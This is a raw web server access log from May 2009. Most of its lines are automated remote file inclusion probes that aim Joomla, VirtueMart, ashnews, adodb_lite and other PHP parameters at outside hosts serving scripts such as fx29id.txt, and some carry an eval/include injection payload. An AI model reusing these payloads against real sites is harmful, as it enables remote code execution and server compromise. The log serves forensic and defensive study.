216.120.237.150 - - [30/May/2009:01:47:52 -0400] "GET /logs/error_log.Q109011700/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 281 "-" "libwww-perl/5.811"
211.234.100.126 - - [30/May/2009:01:48:05 -0400] "GET /logs//main.php?appserv_root=http://shoemasterkorea.com/board/data/as.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.234.100.126 - - [30/May/2009:01:48:05 -0400] "GET /logs/access_log.Q109051800//main.php?appserv_root=http://shoemasterkorea.com/board/data/as.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.234.100.126 - - [30/May/2009:01:48:05 -0400] "GET //main.php?appserv_root=http://shoemasterkorea.com/board/data/as.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.234.100.126 - - [30/May/2009:01:48:08 -0400] "GET //main.php?appserv_root=http://shoemasterkorea.com/board/data/as.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.234.100.126 - - [30/May/2009:01:48:08 -0400] "GET /logs/access_log.Q109051800//main.php?appserv_root=http://shoemasterkorea.com/board/data/as.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.234.100.126 - - [30/May/2009:01:48:09 -0400] "GET /logs//main.php?appserv_root=http://shoemasterkorea.com/board/data/as.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:01:48:21 -0400] "GET /logs/access_log.Q109050700%20%20//main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:01:48:32 -0400] "GET /logs//main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:01:48:35 -0400] "GET //main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:01:48:37 -0400] "GET /logs/access_log.Q109051800//main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:01:50:19 -0400] "GET /logs/access_log.Q109051800//main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:01:50:21 -0400] "GET //main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:01:50:22 -0400] "GET /logs//main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
61.109.245.179 - - [30/May/2009:01:51:16 -0400] "GET /include/mail.inc.php?skin_board_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
61.109.245.179 - - [30/May/2009:01:51:16 -0400] "GET /logs/include/mail.inc.php?skin_board_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.109.245.179 - - [30/May/2009:01:51:16 -0400] "GET /logs/access_log.Q109051100/include/mail.inc.php?skin_board_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
61.109.245.179 - - [30/May/2009:01:51:16 -0400] "GET /include/mail.inc.php?skin_board_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
61.109.245.179 - - [30/May/2009:01:51:16 -0400] "GET /logs/include/mail.inc.php?skin_board_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.109.245.179 - - [30/May/2009:01:51:16 -0400] "GET /logs/access_log.Q109051100/include/mail.inc.php?skin_board_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
75.145.152.113 - - [30/May/2009:01:51:26 -0400] "GET /logs//galeria.php?start=0&kategoria=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
75.145.152.113 - - [30/May/2009:01:51:26 -0400] "GET /logs/access_log.Q108121900//galeria.php?start=0&kategoria=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
75.145.152.113 - - [30/May/2009:01:51:26 -0400] "GET //galeria.php?start=0&kategoria=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
72.188.238.2 - - [30/May/2009:01:51:27 -0400] "GET //main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:01:51:28 -0400] "GET /logs/access_log.Q109051800//main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
75.145.152.113 - - [30/May/2009:01:51:34 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
72.188.238.2 - - [30/May/2009:01:51:36 -0400] "GET /logs//main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.234.100.126 - - [30/May/2009:01:51:39 -0400] "GET /logs/access_log.Q109052300//main.php?appserv_root=http://shoemasterkorea.com/board/data/as.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:01:51:49 -0400] "GET //ashnews.php?pathtoashnews=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:01:51:49 -0400] "GET /logs//ashnews.php?pathtoashnews=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:01:51:50 -0400] "GET /logs/access_log.Q109050700%20%20//ashnews.php?pathtoashnews=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:01:51:56 -0400] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:01:51:56 -0400] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:01:51:56 -0400] "GET /logs/access_log.Q108081500/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:01:52:45 -0400] "GET /logs/access_log.Q109051500%20%20//ashnews.php?pathtoashnews=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:01:53:00 -0400] "GET /port.php?content=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:01:53:00 -0400] "GET /logs/port.php?content=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:01:53:46 -0400] "GET /logs/access_log.Q109050700//ashnews.php?pathtoashnews=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:01:53:51 -0400] "GET /logs/access_log.Q109051500//ashnews.php?pathtoashnews=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.109.245.179 - - [30/May/2009:01:54:35 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.109.245.179 - - [30/May/2009:01:54:35 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.109.245.179 - - [30/May/2009:01:54:35 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.109.245.179 - - [30/May/2009:01:54:46 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.109.245.179 - - [30/May/2009:01:54:47 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.109.245.179 - - [30/May/2009:01:54:47 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:01:54:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.10.128.219 - - [30/May/2009:01:55:11 -0400] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:01:55:11 -0400] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:01:55:11 -0400] "GET /logs/access_log.Q108081500%20%20/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:01:55:22 -0400] "GET /logs/access_log.Q109051600%20%20/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
76.71.122.109 - - [30/May/2009:01:55:33 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
76.71.122.109 - - [30/May/2009:01:55:33 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
76.71.122.109 - - [30/May/2009:01:55:37 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
76.71.122.109 - - [30/May/2009:01:55:37 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
61.109.245.179 - - [30/May/2009:01:55:38 -0400] "GET /logs/access_log.Q109051700//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
75.145.152.113 - - [30/May/2009:01:55:41 -0400] "GET /logs/access_log.Q109051800%20//galeria.php?start=0&kategoria=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
72.18.148.82 - - [30/May/2009:01:56:28 -0400] "GET /index.php?conteudo=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:01:56:28 -0400] "GET /logs/index.php?conteudo=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:01:57:14 -0400] "GET /logs/access_log.Q108081500%20%20/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:01:57:58 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.6.8.108 - - [30/May/2009:01:58:04 -0400] "GET /logs/error_log.Q107073100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.27.203.107 - - [30/May/2009:01:58:53 -0400] "GET /logs/access_log.Q109051100/include/mail.inc.php?skin_board_path=http://stptcellular.net/webalizer/v4id.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
218.27.203.107 - - [30/May/2009:01:58:54 -0400] "GET /include/mail.inc.php?skin_board_path=http://stptcellular.net/webalizer/v4id.txt? HTTP/1.1" 404 218 "-" "libwww-perl/5.79"
218.27.203.107 - - [30/May/2009:01:58:54 -0400] "GET /logs/access_log.Q109051100/include/mail.inc.php?skin_board_path=http://stptcellular.net/webalizer/v4id.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
218.27.203.107 - - [30/May/2009:01:58:54 -0400] "GET /logs/include/mail.inc.php?skin_board_path=http://stptcellular.net/webalizer/v4id.txt? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
218.27.203.107 - - [30/May/2009:01:58:55 -0400] "GET /include/mail.inc.php?skin_board_path=http://stptcellular.net/webalizer/v4id.txt? HTTP/1.1" 404 218 "-" "libwww-perl/5.79"
218.27.203.107 - - [30/May/2009:01:58:55 -0400] "GET /logs/include/mail.inc.php?skin_board_path=http://stptcellular.net/webalizer/v4id.txt? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
72.18.148.82 - - [30/May/2009:01:59:06 -0400] "GET /port.php?content=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:01:59:06 -0400] "GET /logs/port.php?content=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:01:59:10 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.67.16 - - [30/May/2009:01:59:32 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3081C9431851A7004A6D043+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.188.238.2 - - [30/May/2009:01:59:44 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:01:59:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.185.20.88 - - [30/May/2009:02:00:20 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.185.20.88 - - [30/May/2009:02:00:20 -0400] "GET /logs/access_log.Q109052100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.185.20.88 - - [30/May/2009:02:00:21 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.185.20.88 - - [30/May/2009:02:00:41 -0400] "GET /logs/access_log.Q109051700//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.234.100.126 - - [30/May/2009:02:00:46 -0400] "GET /logs/access_log.Q109052300//main.php?appserv_root=http://shoemasterkorea.com/board/data/as.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.109.245.179 - - [30/May/2009:02:00:53 -0400] "GET /logs/access_log.Q109051700//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:02:00:57 -0400] "GET /logs/access_log.Q109051600/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:02:01:09 -0400] "GET /logs/access_log.Q109051800/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:02:01:19 -0400] "GET /logs/access_log.Q109021500%20%20/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
220.181.7.97 - - [30/May/2009:02:02:30 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
218.27.203.107 - - [30/May/2009:02:02:35 -0400] "GET /include/mail.inc.php?skin_board_path=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 218 "-" "libwww-perl/5.79"
218.27.203.107 - - [30/May/2009:02:02:35 -0400] "GET /include/mail.inc.php?skin_board_path=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 218 "-" "libwww-perl/5.79"
123.125.64.38 - - [30/May/2009:02:03:28 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
201.232.54.48 - - [30/May/2009:02:03:30 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:02:03:30 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:02:03:30 -0400] "GET /logs/access_log.Q108081500%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.151.233.72 - - [30/May/2009:02:03:37 -0400] "GET /port.php?content=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
203.151.233.72 - - [30/May/2009:02:03:37 -0400] "GET /logs/port.php?content=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:02:03:38 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:02:03:38 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:02:03:38 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:02:03:55 -0400] "GET /logs/access_log.Q109051100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:02:03:58 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:02:03:58 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:02:03:58 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:02:04:10 -0400] "GET /logs/access_log.Q109050700%20%20//main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:02:04:14 -0400] "GET /logs/access_log.Q109051100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:02:04:18 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:02:04:18 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
203.151.233.72 - - [30/May/2009:02:04:36 -0400] "GET //ashnews.php?pathtoashnews=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
203.151.233.72 - - [30/May/2009:02:04:36 -0400] "GET /logs/access_log.Q109050700//ashnews.php?pathtoashnews=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.151.233.72 - - [30/May/2009:02:04:36 -0400] "GET /logs//ashnews.php?pathtoashnews=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:02:04:43 -0400] "GET /logs/access_log.Q109050700%20%20//main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:02:05:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.79.246.241 - - [30/May/2009:02:05:03 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:02:05:09 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:02:05:13 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:02:05:14 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
203.151.233.72 - - [30/May/2009:02:05:23 -0400] "GET /logs/access_log.Q109051500//ashnews.php?pathtoashnews=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.188.238.2 - - [30/May/2009:02:05:24 -0400] "GET /logs/access_log.Q109050700%20%20//main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:02:06:09 -0400] "GET /logs/access_log.Q109051000%20%20/index.php?conteudo=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.151.233.72 - - [30/May/2009:02:07:33 -0400] "GET /logs/index.php?conteudo=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
203.151.233.72 - - [30/May/2009:02:07:33 -0400] "GET /index.php?conteudo=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
203.151.233.72 - - [30/May/2009:02:07:33 -0400] "GET /logs/error_log.Q109042900/index.php?conteudo=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:02:08:42 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.80.198.13 - - [30/May/2009:02:09:07 -0400] "GET /logs/access_log.Q109051700/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
203.151.233.72 - - [30/May/2009:02:09:55 -0400] "GET /logs/index.php?conteudo=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
203.151.233.72 - - [30/May/2009:02:09:55 -0400] "GET /index.php?conteudo=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:02:10:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.151.233.72 - - [30/May/2009:02:11:12 -0400] "GET /logs/access_log.Q109051000%20%20/index.php?conteudo=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.231.1.87 - - [30/May/2009:02:12:28 -0400] "GET /logs/access_log.Q109051600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dhcom.co.kr/pds/photo/child.gif??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
